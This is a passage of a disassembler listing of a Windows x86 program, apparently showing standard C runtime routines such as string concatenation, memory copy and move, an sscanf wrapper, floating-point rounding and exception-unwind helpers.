mov byte ptr [eax], 0
xor ecx, ecx
and ecx, 0FFh
mov [ebp+var_2C], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_24]
mov [ecx], eax
jmp short loc_41FAA9
; ---------------------------------------------------------------------------
loc_41FA98: ; CODE XREF: sub_41F9C0+B4�j
mov edx, [ebp+var_24]
push edx
push 0
call sub_427CE0
add esp, 8
mov [ebp+var_2C], eax
loc_41FAA9: ; CODE XREF: sub_41F9C0+D6�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F9C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41FAC0 proc near ; CODE XREF: sub_40B2E7+8D�p
; sub_40BBCD+60�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41FB74
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41FAEA
loc_41FADB: ; CODE XREF: sub_41FAC0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41FB1B
test edi, 3
jnz short loc_41FADB
loc_41FAEA: ; CODE XREF: sub_41FAC0+19�j
; sub_41FAC0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41FAEA
mov eax, [edi-4]
test al, al
jz short loc_41FB28
test ah, ah
jz short loc_41FB23
test eax, 0FF0000h
jz short loc_41FB1E
test eax, 0FF000000h
jnz short loc_41FAEA
loc_41FB1B: ; CODE XREF: sub_41FAC0+20�j
dec edi
jmp short loc_41FB2B
; ---------------------------------------------------------------------------
loc_41FB1E: ; CODE XREF: sub_41FAC0+52�j
sub edi, 2
jmp short loc_41FB2B
; ---------------------------------------------------------------------------
loc_41FB23: ; CODE XREF: sub_41FAC0+4B�j
sub edi, 3
jmp short loc_41FB2B
; ---------------------------------------------------------------------------
loc_41FB28: ; CODE XREF: sub_41FAC0+47�j
sub edi, 4
loc_41FB2B: ; CODE XREF: sub_41FAC0+5C�j
; sub_41FAC0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_41FB40
mov ebx, ecx
shr ecx, 2
jnz short loc_41FB8C
jmp short loc_41FB5C
; ---------------------------------------------------------------------------
loc_41FB40: ; CODE XREF: sub_41FAC0+75�j
; sub_41FAC0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_41FB7A
mov [edi], dl
inc edi
dec ecx
jz short loc_41FB70
test esi, 3
jnz short loc_41FB40
mov ebx, ecx
shr ecx, 2
jnz short loc_41FB8C
loc_41FB5C: ; CODE XREF: sub_41FAC0+7E�j
; sub_41FAC0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_41FB70
loc_41FB63: ; CODE XREF: sub_41FAC0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_41FB72
dec ecx
jnz short loc_41FB63
loc_41FB70: ; CODE XREF: sub_41FAC0+8B�j
; sub_41FAC0+A1�j
mov [edi], cl
loc_41FB72: ; CODE XREF: sub_41FAC0+AB�j
pop ebx
pop esi
loc_41FB74: ; CODE XREF: sub_41FAC0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41FB7A: ; CODE XREF: sub_41FAC0+85�j
; sub_41FAC0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41FB84: ; CODE XREF: sub_41FAC0+E4�j
; sub_41FAC0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41FB5C
loc_41FB8C: ; CODE XREF: sub_41FAC0+7C�j
; sub_41FAC0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41FB84
test dl, dl
jz short loc_41FB7A
test dh, dh
jz short loc_41FBD8
test edx, 0FF0000h
jz short loc_41FBC8
test edx, 0FF000000h
jnz short loc_41FB84
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41FBC8: ; CODE XREF: sub_41FAC0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41FBD8: ; CODE XREF: sub_41FAC0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41FAC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBF0 proc near ; CODE XREF: sub_40B419+62�p
; sub_40B419+6F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41FC10
cmp edi, eax
jb loc_41FD88
loc_41FC10: ; CODE XREF: sub_41FBF0+16�j
test edi, 3
jnz short loc_41FC2C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41FC4C
rep movsd
jmp off_41FD38[edx*4]
; ---------------------------------------------------------------------------
loc_41FC2C: ; CODE XREF: sub_41FBF0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41FC44
and eax, 3
add ecx, eax
jmp dword ptr loc_41FC4C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41FC44: ; CODE XREF: sub_41FBF0+46�j
jmp dword ptr loc_41FD48[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41FC4C: ; CODE XREF: sub_41FBF0+31�j
; sub_41FBF0+8E�j ...
jmp off_41FCCC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41FC60
dd offset loc_41FC8C
dd offset loc_41FCB0
; ---------------------------------------------------------------------------
loc_41FC60: ; DATA XREF: sub_41FBF0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41FC4C
rep movsd
jmp off_41FD38[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41FC8C: ; DATA XREF: sub_41FBF0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41FC4C
rep movsd
jmp off_41FD38[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41FCB0: ; DATA XREF: sub_41FBF0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41FC4C
rep movsd
jmp off_41FD38[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41FCCC dd offset loc_41FD2F ; DATA XREF: sub_41FBF0:loc_41FC4C�r
dd offset loc_41FD1C
dd offset loc_41FD14
dd offset loc_41FD0C
dd offset loc_41FD04
dd offset loc_41FCFC
dd offset loc_41FCF4
dd offset loc_41FCEC
; ---------------------------------------------------------------------------
loc_41FCEC: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41FCF4: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41FCFC: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41FD04: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41FD0C: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41FD14: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41FD1C: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41FD2F: ; CODE XREF: sub_41FBF0:loc_41FC4C�j
; DATA XREF: sub_41FBF0:off_41FCCC�o
jmp off_41FD38[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41FD38 dd offset loc_41FD48 ; DATA XREF: sub_41FBF0+35�r
; sub_41FBF0+92�r ...
dd offset loc_41FD50
dd offset loc_41FD5C
dd offset loc_41FD70
; ---------------------------------------------------------------------------
loc_41FD48: ; CODE XREF: sub_41FBF0+35�j
; sub_41FBF0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41FD50: ; CODE XREF: sub_41FBF0+35�j
; sub_41FBF0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41FD5C: ; CODE XREF: sub_41FBF0+35�j
; sub_41FBF0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41FD70: ; CODE XREF: sub_41FBF0+35�j
; sub_41FBF0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41FD88: ; CODE XREF: sub_41FBF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41FDBC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41FDB0
std
rep movsd
cld
jmp off_41FED0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41FDB0: ; CODE XREF: sub_41FBF0+1B1�j
; sub_41FBF0+208�j ...
neg ecx
jmp dword ptr loc_41FE7F+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41FDBC: ; CODE XREF: sub_41FBF0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41FDD4
and eax, 3
sub ecx, eax
jmp dword ptr loc_41FDD4+4[eax*4]
; ---------------------------------------------------------------------------
loc_41FDD4: ; CODE XREF: sub_41FBF0+1D6�j
; DATA XREF: sub_41FBF0+1DD�r
jmp off_41FED0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41FDE8
; ---------------------------------------------------------------------------
or dh, bh
inc ecx
add [eax], dh
inc byte ptr [ecx+0]
loc_41FDE8: ; DATA XREF: sub_41FBF0+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41FDB0
std
rep movsd
cld
jmp off_41FED0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41FDB0
std
rep movsd
cld
jmp off_41FED0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41FDB0
std
rep movsd
cld
jmp off_41FED0[edx*4]
; ---------------------------------------------------------------------------
align 4
test bh, dh
inc ecx
add [esi+edi*8-16BFFBFh], cl
inc ecx
add [esi+edi*8-15BFFBFh], bl
inc ecx
add [esi+edi*8-14BFFBFh], ch
inc ecx
loc_41FE7F: ; DATA XREF: sub_41FBF0+1C2�r
add bh, al
inc byte ptr [ecx+0]
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41FEC7: ; CODE XREF: sub_41FBF0+1C2�j
jmp off_41FED0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41FED0 dd offset loc_41FEE0 ; DATA XREF: sub_41FBF0+1B7�r
; sub_41FBF0:loc_41FDD4�r ...
dd offset loc_41FEE8
dd offset loc_41FEF8
dd offset loc_41FF0C
; ---------------------------------------------------------------------------
loc_41FEE0: ; CODE XREF: sub_41FBF0+1B7�j
; sub_41FBF0:loc_41FDD4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41FEE8: ; CODE XREF: sub_41FBF0+1B7�j
; sub_41FBF0:loc_41FDD4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41FEF8: ; CODE XREF: sub_41FBF0+1B7�j
; sub_41FBF0:loc_41FDD4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41FF0C: ; CODE XREF: sub_41FBF0+1B7�j
; sub_41FBF0:loc_41FDD4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41FBF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF30 proc near ; CODE XREF: sub_40C575+40�p
; _0:0040EBBA�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_8]
mov [ebp+var_2C], ecx
loc_41FF45: ; CODE XREF: sub_41FF30+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41FF69
push offset aStringNull ; "string != NULL"
push 0
push 42h
push offset aSscanf_c ; "sscanf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41FF69
int 3 ; Trap to Debugger
loc_41FF69: ; CODE XREF: sub_41FF30+19�j
; sub_41FF30+36�j
xor edx, edx
test edx, edx
jnz short loc_41FF45
loc_41FF6F: ; CODE XREF: sub_41FF30+67�j
cmp [ebp+arg_4], 0
jnz short loc_41FF93
push offset aFormatNull ; "format != NULL"
push 0
push 43h
push offset aSscanf_c ; "sscanf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41FF93
int 3 ; Trap to Debugger
loc_41FF93: ; CODE XREF: sub_41FF30+43�j
; sub_41FF30+60�j
xor eax, eax
test eax, eax
jnz short loc_41FF6F
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 49h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+arg_0]
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_429E90
add esp, 0Ch
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41FF30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41FFF0(double)
sub_41FFF0 proc near ; CODE XREF: sub_40D798+38�p
var_1C = qword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push 0FFFFh
mov eax, ds:dword_451810
push eax
call sub_42C2F0
add esp, 8
mov [ebp+var_C], eax
mov ecx, dword ptr [ebp+arg_0+6]
and ecx, 0FFFFh
and ecx, 7FF0h
cmp ecx, 7FF0h
jnz loc_4200AB
mov edx, dword ptr [ebp+arg_0+4]
push edx
mov eax, dword ptr [ebp+arg_0]
push eax
call sub_42C0F0
add esp, 8
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jle short loc_420082
cmp [ebp+var_10], 2
jle short loc_42004E
cmp [ebp+var_10], 3
jz short loc_420067
jmp short loc_420082
; ---------------------------------------------------------------------------
loc_42004E: ; CODE XREF: sub_41FFF0+54�j
push 0FFFFh
mov ecx, [ebp+var_C]
push ecx
call sub_42C2F0
add esp, 8
fld [ebp+arg_0]
jmp loc_420121
; ---------------------------------------------------------------------------
loc_420067: ; CODE XREF: sub_41FFF0+5A�j
mov edx, [ebp+var_C]
push edx ; int
mov eax, dword ptr [ebp+arg_0+4]
push eax
mov ecx, dword ptr [ebp+arg_0]
push ecx ; double
push 0Bh ; int
call sub_42B3B0
add esp, 10h
jmp loc_420121
; ---------------------------------------------------------------------------
loc_420082: ; CODE XREF: sub_41FFF0+4E�j
; sub_41FFF0+5C�j
mov edx, [ebp+var_C]
push edx ; int
fld [ebp+arg_0]
fadd ds:dbl_43CD98
sub esp, 8
fstp [esp+1Ch+var_1C]
mov eax, dword ptr [ebp+arg_0+4]
push eax ; int
mov ecx, dword ptr [ebp+arg_0]
push ecx ; int
push 0Bh ; int
push 8 ; int
call sub_42B480
add esp, 1Ch
jmp short loc_420121
; ---------------------------------------------------------------------------
loc_4200AB: ; CODE XREF: sub_41FFF0+31�j
mov edx, dword ptr [ebp+arg_0+4]
push edx
mov eax, dword ptr [ebp+arg_0]
push eax ; double
call sub_42B390
add esp, 8
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
fnstsw ax
test ah, 40h
jz short loc_4200E1
push 0FFFFh
mov ecx, [ebp+var_C]
push ecx
call sub_42C2F0
add esp, 8
fld [ebp+var_8]
jmp short loc_420121
; ---------------------------------------------------------------------------
loc_4200E1: ; CODE XREF: sub_41FFF0+D9�j
mov edx, [ebp+var_C]
and edx, 20h
test edx, edx
jz short loc_420101
push 0FFFFh
mov eax, [ebp+var_C]
push eax
call sub_42C2F0
add esp, 8
fld [ebp+var_8]
jmp short loc_420121
; ---------------------------------------------------------------------------
loc_420101: ; CODE XREF: sub_41FFF0+F9�j
mov ecx, [ebp+var_C]
push ecx ; int
mov edx, dword ptr [ebp+var_8+4]
push edx
mov eax, dword ptr [ebp+var_8]
push eax ; double
mov ecx, dword ptr [ebp+arg_0+4]
push ecx ; int
mov edx, dword ptr [ebp+arg_0]
push edx ; int
push 0Bh ; int
push 10h ; int
call sub_42B480
add esp, 1Ch
loc_420121: ; CODE XREF: sub_41FFF0+72�j
; sub_41FFF0+8D�j ...
mov esp, ebp
pop ebp
retn
sub_41FFF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420130 proc near ; CODE XREF: sub_41E860+C�p
; DATA XREF: _2:off_45181C�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_420170
call sub_42C430
mov ds:dword_4F3340, eax
call sub_42C3B0
fnclex
pop edi
pop esi
pop ebx
pop ebp
retn
sub_420130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420160 proc near ; DATA XREF: _2:00451820�o _2:00451824�o
push ebp
mov ebp, esp
pop ebp
retn
sub_420160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420170 proc near ; CODE XREF: sub_420130+6�p
push ebp
mov ebp, esp
mov ds:off_454190, offset sub_42CB20
mov ds:off_454194, offset sub_42C530
mov ds:off_454198, offset sub_42C640
mov ds:off_45419C, offset sub_42C480
mov ds:off_4541A0, offset sub_42C610
mov ds:off_4541A4, offset sub_42CB20
pop ebp
retn
sub_420170 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F333C
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:dword_4F333C, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4201DC proc near ; CODE XREF: sub_40D798+1B�p
; sub_40D798+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_4201DC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_420210(double)
sub_420210 proc near ; CODE XREF: sub_40D7E4+79�p
; sub_40E29B+398�p
var_1C = qword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push 0FFFFh
mov eax, ds:dword_451828
push eax
call sub_42C2F0
add esp, 8
mov [ebp+var_C], eax
mov ecx, dword ptr [ebp+arg_0+6]
and ecx, 0FFFFh
and ecx, 7FF0h
cmp ecx, 7FF0h
jnz loc_4202CB
mov edx, dword ptr [ebp+arg_0+4]
push edx
mov eax, dword ptr [ebp+arg_0]
push eax
call sub_42C0F0
add esp, 8
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jle short loc_4202A2
cmp [ebp+var_10], 2
jle short loc_42026E
cmp [ebp+var_10], 3
jz short loc_420287
jmp short loc_4202A2
; ---------------------------------------------------------------------------
loc_42026E: ; CODE XREF: sub_420210+54�j
push 0FFFFh
mov ecx, [ebp+var_C]
push ecx
call sub_42C2F0
add esp, 8
fld [ebp+arg_0]
jmp loc_420341
; ---------------------------------------------------------------------------
loc_420287: ; CODE XREF: sub_420210+5A�j
mov edx, [ebp+var_C]
push edx ; int
mov eax, dword ptr [ebp+arg_0+4]
push eax
mov ecx, dword ptr [ebp+arg_0]
push ecx ; double
push 0Ch ; int
call sub_42B3B0
add esp, 10h
jmp loc_420341
; ---------------------------------------------------------------------------
loc_4202A2: ; CODE XREF: sub_420210+4E�j
; sub_420210+5C�j
mov edx, [ebp+var_C]
push edx ; int
fld [ebp+arg_0]
fadd ds:dbl_43CD98
sub esp, 8
fstp [esp+1Ch+var_1C]
mov eax, dword ptr [ebp+arg_0+4]
push eax ; int
mov ecx, dword ptr [ebp+arg_0]
push ecx ; int
push 0Ch ; int
push 8 ; int
call sub_42B480
add esp, 1Ch
jmp short loc_420341
; ---------------------------------------------------------------------------
loc_4202CB: ; CODE XREF: sub_420210+31�j
mov edx, dword ptr [ebp+arg_0+4]
push edx
mov eax, dword ptr [ebp+arg_0]
push eax ; double
call sub_42B390
add esp, 8
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
fnstsw ax
test ah, 40h
jz short loc_420301
push 0FFFFh
mov ecx, [ebp+var_C]
push ecx
call sub_42C2F0
add esp, 8
fld [ebp+var_8]
jmp short loc_420341
; ---------------------------------------------------------------------------
loc_420301: ; CODE XREF: sub_420210+D9�j
mov edx, [ebp+var_C]
and edx, 20h
test edx, edx
jz short loc_420321
push 0FFFFh
mov eax, [ebp+var_C]
push eax
call sub_42C2F0
add esp, 8
fld [ebp+var_8]
jmp short loc_420341
; ---------------------------------------------------------------------------
loc_420321: ; CODE XREF: sub_420210+F9�j
mov ecx, [ebp+var_C]
push ecx ; int
mov edx, dword ptr [ebp+var_8+4]
push edx
mov eax, dword ptr [ebp+var_8]
push eax ; double
mov ecx, dword ptr [ebp+arg_0+4]
push ecx ; int
mov edx, dword ptr [ebp+arg_0]
push edx ; int
push 0Ch ; int
push 10h ; int
call sub_42B480
add esp, 1Ch
loc_420341: ; CODE XREF: sub_420210+72�j
; sub_420210+8D�j ...
mov esp, ebp
pop ebp
retn
sub_420210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420350 proc near ; CODE XREF: sub_42D250+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_420350 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420390 proc near ; CODE XREF: sub_42D730+50�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_420390 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4203A0 proc near ; CODE XREF: sub_42D4B0+247�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4203A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4203B0 proc near ; CODE XREF: sub_42D4B0+21E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4203B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4203C0 proc near ; CODE XREF: sub_420610+66�p
; sub_42D250+38�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_4203EC
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_43ABA6 ; RtlUnwind
loc_4203EC: ; DATA XREF: sub_4203C0+12�o
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
and ecx, 0FFFFFFFDh
mov edx, [ebp+arg_4]
mov [edx+4], ecx
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_4203C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420420 proc near ; CODE XREF: _0:0043B834�j _0:0043B84E�j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp+var_8], eax
push 0
push 0
push 0
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42CBB0
add esp, 20h
mov [ebp+var_4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_420420 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [eax+1Ch]
push ecx
mov edx, [ebp+8]
mov eax, [edx+28h]
push eax
push 0
mov ecx, [ebp+8]
mov edx, [ecx+18h]
push edx
call sub_42D120
add esp, 10h
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420490 proc near ; CODE XREF: sub_42D310+8A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
